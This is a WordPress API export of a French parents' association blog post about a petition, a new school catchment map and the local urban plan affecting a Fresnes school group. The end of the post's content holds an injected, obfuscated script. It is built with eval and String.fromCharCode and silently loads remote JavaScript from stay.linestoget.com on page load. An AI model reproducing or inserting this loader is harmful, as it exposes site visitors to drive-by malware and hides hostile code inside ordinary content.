{"id":7483,"date":"2017-01-16T20:54:32","date_gmt":"2017-01-16T19:54:32","guid":{"rendered":"http:\/\/education.acctif.eu\/?p=7483"},"modified":"2018-01-23T16:47:10","modified_gmt":"2018-01-23T15:47:10","slug":"petition-futur-plu-nouvelle-carte-scolaire-quel-avenir-pour-le-groupe-scolaire-rouxpasteurblancs-bouleaux","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7483","title":{"rendered":"P\u00e9tition, futur PLU, nouvelle carte scolaire : quel avenir pour le groupe scolaire Roux\/Pasteur\/Blancs Bouleaux ?"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Dans le cadre de l&rsquo;\u00e9tude urbaine Fresnes 2030 portant sur le devenir de la ville \u00e0 cet horizon de 15 ans, nous tenions \u00e0 vous informer qu\u2019une <strong>p\u00e9tition a \u00e9t\u00e9 lanc\u00e9e par <a href=\"https:\/\/sites.google.com\/site\/aturbacv\/\" target=\"_blank\" rel=\"noopener\">l\u2019association AtUrbaCV<\/a>, qui s\u2019intitule\u00a0\u00ab\u00a0Non \u00e0 la destruction des \u00e9coles Pasteur-Roux-Blancs Bouleaux\u00a0\u00bb afin de continuer\u00a0la r\u00e9flexion sur le futur groupe scolaire sans exclure aucune piste<\/strong>. Si vous \u00eates int\u00e9ress\u00e9 pour signer cette p\u00e9tition, vous la trouverez <a href=\"https:\/\/www.change.org\/p\/monsieur-jean-jacques-bridey-d%C3%A9put%C3%A9-maire-de-fresnes-non-%C3%A0-la-destruction-des-%C3%A9coles-pasteur-roux-blancs-bouleaux?recruiter=640912013&amp;utm_source=share_petition&amp;utm_medium=copylink\" target=\"_blank\" rel=\"noopener\">ici sur\u00a0le site internet de p\u00e9titions\u00a0<\/a><\/span><span style=\"font-weight: 400;\">Change.org<\/span><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A ce propos, nous tenions \u00e0 vous rappeler qu\u2019ACCTIF Education avait r\u00e9dig\u00e9<a href=\"https:\/\/education.acctif.eu\/2016\/06\/12\/etude-urbaine-fresnes-2030-lavis-des-parents-deleves-doit-etre-pris-en-compte\/\" target=\"_blank\" rel=\"noopener\"> un document de synth\u00e8se sur le devenir du groupe scolaire<\/a> regroupant les avis d\u2019enseignants, du personnel p\u00e9riscolaire, ainsi que d\u2019associations ou de syndicats du domaine de la Peupleraie tous concern\u00e9s par le devenir du groupe scolaire.\u00a0<\/span><span style=\"font-weight: 400;\">Ce document \u00e9tay\u00e9 de 10 pages, qui s\u2019intitule \u00ab\u00a0Groupe scolaire Roux-Pasteur-Blancs Bouleaux \u2013 Avis et expression de besoins\u00a0\u00bb a \u00e9t\u00e9 envoy\u00e9 \u00e0 la mairie en Juin 2016.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Nous n\u2019avons \u00e0 ce jour pas eu de retour de la mairie de Fresnes sur ce document, sachant qu\u2019il a pour principaux m\u00e9rites de proposer diff\u00e9rentes options concernant le devenir du groupe scolaire (reconstruction\/r\u00e9habilitation) et d\u2019interroger les acteurs publics sur des probl\u00e9matiques d\u2019effectifs, de dimensionnement de l\u2019\u00e9cole ou d\u2019\u00e9quipements publics attenant au groupe scolaire.<\/span><\/p>\n<p><span style=\"font-weight: 400;\"><strong>Nous d\u00e9plorons le fait que les associations de parents d\u2019\u00e9l\u00e8ves n\u2019aient pas \u00e9t\u00e9 associ\u00e9es \u00e0 la r\u00e9flexion sur ce projet.<\/strong>\u00a0Ainsi, en partie gr\u00e2ce \u00e0 notre mobilisation et celle des citoyens fresnois, le groupe scolaires sera finalement reconstruit en lieu et place de l\u2019actuel. Nous pouvons nous en f\u00e9liciter, mais <strong>avec une surface d\u2019implantation plus petite et une capacit\u00e9 d\u2019accueil moindre<\/strong> sans gymnase et sans terrain d\u2019\u00e9volution par exemple. \u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Ainsi, de nombreuses questions peuvent se poser quant \u00e0 la mise en place de ce sc\u00e9nario, qui engagera les citoyens de la ville d\u2019une part financi\u00e8rement pour mener \u00e0 bien ce projet, et d\u2019autre part qui remod\u00e8lera la carte scolaire de mani\u00e8re importante pour les g\u00e9n\u00e9rations \u00e0 venir. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Depuis la r\u00e9union publique du 27 juin dernier, nous n&rsquo;avons re\u00e7u aucune information compl\u00e9mentaire de la part de la mairie, et ce malgr\u00e9 nos sollicitations notamment en Conseil d&rsquo;\u00e9cole : calendrier des travaux, budg\u00e9tisation, dimensionnement des effectifs pr\u00e9vus.<\/span><\/p>\n<p><strong>Une nouvelle carte scolaire a \u00e9t\u00e9 pr\u00e9sent\u00e9e le 9 novembre aux associations de parents d&rsquo;\u00e9l\u00e8ves, en Commission extra-municipale.<\/strong><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/img_20161108_222719_hdr.jpg\"><br \/>\n<\/a><\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-16-at-8-44-49-pm.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-7503 aligncenter\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-16-at-8-44-49-pm.png?w=700\" alt=\"screen-shot-2017-01-16-at-8-44-49-pm\" width=\"700\" height=\"527\" \/><\/a><\/p>\n<ul>\n<li>En rose, le p\u00e9rim\u00e8tre concern\u00e9 qui sera scolaris\u00e9 sur le nouveau groupe scolaire du Parc des Aulnes, dont les zones pavillionnaires de La Madeleine et des Fleurs.<\/li>\n<li>En vers tr\u00e8s clair, toute la zone concern\u00e9e par le nouveau groupe scolaire Pasteur\/Blancs Bouleaux.<\/li>\n<li>En vers fonc\u00e9 : Barbara.<\/li>\n<li>En orange clair : les \u00e9l\u00e8ves qui seront scolaris\u00e9s dans la nouvelle \u00e9cole \u00e9l\u00e9mentaire et maternelle du centre ville.<\/li>\n<li>En jaune fonc\u00e9 : les \u00e9l\u00e8ves scolaris\u00e9s sur Monod-Coquelicot.<\/li>\n<\/ul>\n<p>Retrouvez ici <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/carte_scolaire-2.pdf\">l&rsquo;ensemble du document pr\u00e9sent\u00e9 par la mairie<\/a>\u00a0qui pr\u00e9sente la r\u00e9partition des enfants avec la cr\u00e9ation des 3 nouveaux groupes scolaires.<a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/screen-shot-2017-01-16-at-8-44-49-pm.png\"><br \/>\n<\/a><\/p>\n<p>Autre document important qui a \u00e9t\u00e9 pr\u00e9sent\u00e9 \u00e0 une poign\u00e9e de Fresnois le 12 d\u00e9cembre dernier,<strong> le projet de r\u00e9vision du Plan Local d&rsquo;Urbanisme (PLU) qui va structurer l&rsquo;am\u00e9nagement urbain durant les prochaines ann\u00e9es<\/strong>. Vous constaterez que l&rsquo;espace r\u00e9serv\u00e9 au <strong>groupe scolaire est r\u00e9duit \u00e0 un mouchoir-de-poche<\/strong>.<\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/precc81sentationpludec2016.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-7486 alignnone\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/precc81sentationpludec2016.jpg?w=700\" alt=\"Pr\u00e9sentation PLU D\u00e9cembre 2016\" width=\"700\" height=\"525\" \/><\/a><\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7491\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page2.jpg?w=700\" alt=\"pludec2016page2\" width=\"700\" height=\"525\" \/><\/a><\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7498\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page3.jpg?w=700\" alt=\"pludec2016page3\" width=\"700\" height=\"525\" \/><\/a> <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page9.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7499\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page9.jpg?w=700\" alt=\"pludec2016page9\" width=\"700\" height=\"525\" \/><\/a><\/p>\n<p><a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7492\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page4.jpg?w=700\" alt=\"pludec2016page4\" width=\"700\" height=\"525\" \/><\/a> <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7493\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page5.jpg?w=700\" alt=\"pludec2016page5\" width=\"700\" height=\"525\" \/><\/a> <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page6.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7494\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page6.jpg?w=700\" alt=\"pludec2016page6\" width=\"700\" height=\"525\" \/><\/a> <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page7.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7495\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page7.jpg?w=700\" alt=\"pludec2016page7\" width=\"700\" height=\"525\" \/><\/a> <a href=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page8.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-7496\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2017\/01\/pludec2016page8.jpg?w=700\" alt=\"pludec2016page8\" width=\"700\" height=\"525\" \/><\/a>Nous vous tiendrons au courant de l\u2019\u00e9volution de la situation dans les prochaines semaines, et d\u2019ici l\u00e0, n\u2019h\u00e9sitez pas \u00e0 nous faire remonter les informations, les remarques ou les demandes que vous pourriez avoir sur ce sujet.<\/p>\n<p>&nbsp;<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dans le cadre de l&rsquo;\u00e9tude urbaine Fresnes 2030 portant sur le devenir de la ville \u00e0 cet horizon de 15 ans, nous tenions \u00e0 vous informer qu\u2019une p\u00e9tition a \u00e9t\u00e9 lanc\u00e9e par l\u2019association AtUrbaCV, qui s\u2019intitule\u00a0\u00ab\u00a0Non \u00e0 la destruction des \u00e9coles Pasteur-Roux-Blancs Bouleaux\u00a0\u00bb afin de continuer\u00a0la r\u00e9flexion sur le futur groupe scolaire sans exclure aucune &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7483\"> <span class=\"screen-reader-text\">P\u00e9tition, futur PLU, nouvelle carte scolaire : quel avenir pour le groupe scolaire Roux\/Pasteur\/Blancs Bouleaux ?<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7662,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[35,36,37],"tags":[],"class_list":["post-7483","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blancs-bouleaux","category-pasteur","category-roux"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7483"}],"version-history":[{"count":1,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7483\/revisions"}],"predecessor-version":[{"id":7663,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7483\/revisions\/7663"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7662"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7483"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}